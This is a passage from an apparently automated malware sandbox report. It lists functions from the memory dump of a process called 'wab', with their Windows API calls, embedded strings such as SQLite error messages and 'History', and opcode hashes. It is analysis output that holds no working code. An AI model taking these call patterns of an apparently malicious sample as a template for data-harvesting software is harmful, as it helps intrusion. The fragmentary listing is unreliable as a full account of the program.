                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2903831945-0
                                                                                                                                                                                                                      • Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$??3@
                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                      • API String ID: 3314356048-2133833424
                                                                                                                                                                                                                      • Opcode ID: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
